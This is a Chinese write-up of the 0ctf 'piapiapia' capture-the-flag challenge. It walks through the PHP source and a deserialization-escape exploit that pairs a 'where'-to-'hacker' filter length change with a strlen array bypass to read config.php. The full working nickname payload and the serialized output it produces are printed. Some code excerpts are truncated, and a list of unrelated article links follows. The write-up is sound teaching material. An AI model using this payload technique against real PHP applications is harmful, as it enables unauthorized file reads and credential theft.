攻防世界 0ctf-unserialize(piapipia)
本文共 4167 字,大约阅读时间需要 13 分钟。
- 题目考点:任意文件读取 + php代码审计反序列化
- 我已经做题之前先dirsearch一下了
- 先尝试了一下流程
- 首先是注册页面注册 账号 接着在update界面取补充信息 最后返回发profile页面 里面有自己注册时候的信息
- 接着我们就来看看www.zip给的网页源码
- register.php
16) die('Invalid user name'); if(strlen($password) < 3 or strlen($password) > 16) die('Invalid password'); if(!$user->is_exists($username)) { $user->register($username, $password); echo 'Register OK!Please Login'; } else { die('User name Already Exists'); } } else { ?> - 没有什么操作 简单的限制了用户名和用户密码
- update.php
10) die('Invalid nickname'); $file = $_FILES['photo']; if($file['size'] < 5 or $file['size'] > 1000000) die('Photo size error'); move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name'])); $profile['phone'] = $_POST['phone']; $profile['email'] = $_POST['email']; $profile['nickname'] = $_POST['nickname']; $profile['photo'] = 'upload/' . md5($file['name']); $user->update_profile($username, serialize($profile)); echo 'Update Profile Success!Your Profile'; } - 做出了 以下的限制
- 电话号码必须为11位数
- email必须为10个以内的数字和字母@10个以内的数字和字母.10个以内的数字和字母
- nickname 必须是小于十位的数字、字母和下划线
- 文件的大小也进行了限制 文件名进行了md5加密
- 最后对profile数组进行了序列化 这里应该就是题目的考点之一了
- profile.php
show_profile($username); if($profile == null) { header('Location: update.php'); } else { $profile = unserialize($profile); $phone = $profile['phone']; $email = $profile['email']; $nickname = $profile['nickname']; $photo = base64_encode(file_get_contents($profile['photo']));?> - 这里进行了一次反序列化 在$photo的位置进行了file_get_contents($profile[‘photo’]),如果我们这里的photo值是flag文件,就可以读取到文件内容了
- 还有一个class.php文件 里面是user类和mysql类 重点代码截取了下来
public function filter($string) { $escape = array('\'', '\\\\'); $escape = '/' . implode('|', $escape) . '/'; $string = preg_replace($escape, '_', $string); $safe = array('select', 'insert', 'update', 'delete', 'where'); $safe = '/' . implode('|', $safe) . '/i'; return preg_replace($safe, 'hacker', $string); } - 前两天做到了过滤+反序列化 很明显这道题的考点也就是反序列化逃逸
- 接下来就是解题了
- 我们想要的是序列化后的结果为
a:4:{ s:5:"phone";s:11:"12345678910";s:5:"email";s:10:"123@qq.com";s:8:"nickname";s:6:"xbx_0d";s:5:"photo";s:10:"config.php";} - 这样的话 就会直接读取config.php文件里面的内容了
- 我们需要从phone、email、nicknam、photo中选择一个进行反序列化的逃逸
这里就要补充一个知识点了
- if(preg_match(’/[^a-zA-Z0-9_]/’, $_POST[‘nickname’]) || strlen($_POST[‘nickname’]) > 10) die(‘Invalid nickname’);
- strlen函数可以通过数组绕过 strlen(Array()) = null
- 所以这里我们可以通过数组绕过长度的限制 接着我们就是去构造payload了
- 运行结果是
a:4:{s:5:"phone";s:11:"12345678910";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:6:"xbx_0d";}s:5:"photo";s:10:"config.php";} - 这是我们想要的效果
- 所以我们需要序列化逃逸的部分就是
;}s:5:"photo";s:10:"config.php";}总共三十四位 - 而且面的filter函数会讲where替换为hacker 也就是多了一位
- 这样的话如果我们上传nickname的值为 -
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";} - 就会有以下代码形成的结果
- 运行结果
a:4:{s:5:"phone";s:11:"12345678910";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:11:"aaaaaaaaaaa";}替换后a:4:{s:5:"phone";s:11:"12345678910";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:11:"aaaaaaaaaaa";}反序列化a:4:{s:5:"phone";s:11:"12345678910";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";} - 原先photo的值就被抛弃了 这就是反序列化逃逸的结果了
- 这样的话我们file_get_contents就是config.php文件了
- 看一下flag吧
- 总结
- 题目重点就是题目名序列化
- 主要考察反序列化的逃逸
- 其次加了个strlen()函数的数组绕过
- file_get_contents()应该算是个SSRF吧
- Tips:
刚刚私信大佬 为啥config.php里面没有flag,读取的时候却有flag
我发出的瞬间才反应过来这个傻子问题 www.zip是直接给你的 不代表它用的config.php就是给你的config.php
转载地址:http://oywmf.baihongyu.com/
你可能感兴趣的文章
检测iOS的网络可用性并打开网络设置
查看>>
简单封装FMDB操作sqlite的模板
查看>>
iOS开发中Instruments的用法
查看>>
iOS常用宏定义
查看>>
被废弃的dispatch_get_current_queue
查看>>
什么是ActiveRecord
查看>>
有道词典for mac在Mac OS X 10.9不能取词
查看>>
关于“团队建设”的反思
查看>>
利用jekyll在github中搭建博客
查看>>
Windows7中IIS简单安装与配置(详细图解)
查看>>
linux基本命令
查看>>
BlockQueue 生产消费 不需要判断阻塞唤醒条件
查看>>
ExecutorService 线程池 newFixedThreadPool newSingleThreadExecutor newCachedThreadPool
查看>>
强引用 软引用 弱引用 虚引用
查看>>
数据类型 java转换
查看>>
"NetworkError: 400 Bad Request - http://172.16.47.117:8088/rhip/**/####t/approval?date=976
查看>>
mybatis 根据 数据库表 自动生成 实体
查看>>
win10将IE11兼容ie10
查看>>
checkbox设置字体颜色
查看>>
第一篇 HelloWorld.java重新学起
查看>>